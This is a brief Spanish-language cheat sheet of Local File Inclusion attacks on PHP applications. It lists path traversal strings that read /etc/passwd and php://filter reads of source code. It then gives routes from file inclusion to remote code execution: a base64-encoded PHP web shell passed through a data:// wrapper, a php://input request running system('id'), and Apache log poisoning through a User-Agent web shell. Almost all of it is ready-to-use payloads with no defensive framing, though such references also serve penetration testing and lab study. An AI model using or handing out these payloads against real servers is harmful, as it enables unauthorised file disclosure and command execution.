Local File Inclusion (LFI)
Cheatsheet Rápido
- Básico:
../../../../etc/passwd - Null Byte:
../../etc/passwd%00(PHP < 5.3) - Path Truncation:
....//....//etc/passwd
PHP Wrappers (Lectura)
Leer archivos codificados en Base64 (evita ejecución):
php://filter/convert.base64-encode/resource=index.php
LFI to RCE (Ejecución)
1. Data Wrapper:
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+&cmd=id
2. PHP Input (POST):
URL: ?page=php://input | Body: <?php system('id'); ?>
3. Log Poisoning:
- User-Agent:
<?php system($_GET['c']); ?> - LFI:
/var/log/apache2/access.log&c=ls
4. PHP Filter Chain Generator: Usa php_filter_chain_generator para RCE sin subir archivos.